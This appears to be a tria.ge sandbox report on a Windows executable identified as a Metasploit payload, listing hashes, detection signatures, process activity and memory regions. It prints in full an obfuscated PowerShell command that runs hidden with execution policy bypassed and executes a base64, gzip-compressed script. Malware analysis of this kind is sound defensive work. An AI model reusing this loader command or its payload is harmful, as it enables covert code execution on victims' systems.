Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    94s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/09/2024, 05:22

General

  • Target

    334a10500feb0f3444bf2e86ab2e76da.exe

  • Size

    1.5MB

  • MD5

    334a10500feb0f3444bf2e86ab2e76da

  • SHA1

    c6a97b63fbd970984b95ae79a2b2aef5749ee463

  • SHA256

    0c82e654c09c8fd9fdf4899718efa37670974c9eec5a8fc18a167f93cea6ee83

  • SHA512

    9c85eff62ef12564f02735c58b64c581da7107cd250829ce88cc569c5def675d76da3b538a4a394aa2747c375fe683d629e552c3c279d35d6db8484467a530de

  • SSDEEP

    24576:913gJnNiQQSA7Ph8NKvKUWq8U5EDvLJPjraFLR5ROWgNcEDvLJPjraFLR5ROx:9WjrHKvKUYPjrkp7gRjrkpO

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\334a10500feb0f3444bf2e86ab2e76da.exe
    "C:\Users\Admin\AppData\Local\Temp\334a10500feb0f3444bf2e86ab2e76da.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5052
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAOW/UWECA51W227jNhB991cMXHUtIRbhdbdAESCLepVsGyDdNVZu82AYCE2NYzUyqZKUL0j87yUlypLjBNtUL7aGczlz5kL9AGOxQbkoOIRwK1OtkcN8B5/Mz6SQHCW8g0u6RvidymTX6RhNplPB4TfU4S3OWZYi19B57IB5vA2DC/iCm/Dr/G9kGsLJLscvdIVGqInRj0r9Wpn8qfASF7TIdCQxMScpzZRx4WlZ4EFrLMV2R55pGHlLUut29g3EvE6t8wjl+ZhKuvKr/9NYy5Tfz7xIrFaUJ/1jaawyJvgz4aXY8EzQpJQGzqcUDJUCR8BKJEWGFuCvfgCVSroAvw4DIf4D3XnKk25QHlZ2pW2WKkO/ofzChNyZ/ytiWYsFe0CtyITlN05j9suHDz+dGhKlqdQ2rotcnroSXbT0Roxhro3Dqhx+BWX/GlyJa5QKTxEfXLdK/hLyaOwCdeeCF2pImJC5kFRj+U7zPEsZtUUjmWA06/Ztgg5Vp2JWaYl0ZdOoohLTgXEpM/Ab4FXhKty2ibquTi3USmVx7ewV4MgKMww7Eteqvovf9xam27DvP3oT430PIVUwPbL5hiuhMUKp04XNCv+iWZqU2UU0y+aUPcyC4AU4ZFTope1nazRSb6QsaJW84arJtU3mdL7TOJ3NPPtrm3VAyHBgnqcfHwd7xzfypD72pxq3miBnIrGTcH4+iqPr68DW4JPV8bu3pqXFRlX7JF5iloEsODfaYBgqlGnrLpyBh3x9bt+4XQpnRmaKdThgYpUXujm845HIdzK9X2rwowCGg/c/wx8pk0KJhYbIUWJJgJGNaDUVSDQB1piQO37HXdc6Tohdcug32fUH/eaF3CC/18t2P9Uz3+6ok4Z6G1XTsxncGJeWG7cvyAHn27HWVp+FvKJsaTBXTiHlh33UaDWw7eMfrfGA1NlWG6/2FDxd87V4wPBqmxtuleH74GV/PKRvYqI3jqFn6lyiuBFVOwdkTPXSSHsfe/+7dJtlmqHve2k5A5X5N6SJX3V8HwZ98I7sAgg5wuCktlcWPiYTk8prV5tbHFaFlCleuZQbL2b8qYXS8ub2V0lznQ54afCsrcy2sFyeFADCekVXzocf372HJ/ha6LDyCo6KI1dDKAmpHRuSv1MC6DVOthaIh1IKOR3MjoK1UJfnhGVIpR+8hOCi/WIGf9s5naT/1D6Nm++OTrtVTgantvmcFWp5uLXdGnSXTZQJhS6f5h6Ntcjry9N8eXQOXxyH4rirE0J3L9kF8i/mtl93dQkAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2992

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_01wy0mpf.muy.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2992-6-0x0000000005230000-0x0000000005858000-memory.dmp

    Filesize

    6.2MB

  • memory/2992-20-0x0000000005EB0000-0x0000000005ECE000-memory.dmp

    Filesize

    120KB

  • memory/2992-5-0x00000000733F0000-0x0000000073BA0000-memory.dmp

    Filesize

    7.7MB

  • memory/2992-29-0x00000000733F0000-0x0000000073BA0000-memory.dmp

    Filesize

    7.7MB

  • memory/2992-7-0x0000000005040000-0x0000000005062000-memory.dmp

    Filesize

    136KB

  • memory/2992-8-0x00000000050E0000-0x0000000005146000-memory.dmp

    Filesize

    408KB

  • memory/2992-9-0x0000000005150000-0x00000000051B6000-memory.dmp

    Filesize

    408KB

  • memory/2992-3-0x00000000733FE000-0x00000000733FF000-memory.dmp

    Filesize

    4KB

  • memory/2992-4-0x0000000004A20000-0x0000000004A56000-memory.dmp

    Filesize

    216KB

  • memory/2992-19-0x00000000058E0000-0x0000000005C34000-memory.dmp

    Filesize

    3.3MB

  • memory/2992-21-0x0000000005F60000-0x0000000005FAC000-memory.dmp

    Filesize

    304KB

  • memory/2992-22-0x00000000077F0000-0x0000000007E6A000-memory.dmp

    Filesize

    6.5MB

  • memory/2992-23-0x00000000063D0000-0x00000000063EA000-memory.dmp

    Filesize

    104KB

  • memory/2992-24-0x00000000072B0000-0x0000000007346000-memory.dmp

    Filesize

    600KB

  • memory/2992-25-0x00000000070F0000-0x0000000007112000-memory.dmp

    Filesize

    136KB

  • memory/2992-26-0x0000000008420000-0x00000000089C4000-memory.dmp

    Filesize

    5.6MB

  • memory/5052-0-0x0000000000400000-0x0000000000580A04-memory.dmp

    Filesize

    1.5MB

  • memory/5052-30-0x0000000000400000-0x0000000000580A04-memory.dmp

    Filesize

    1.5MB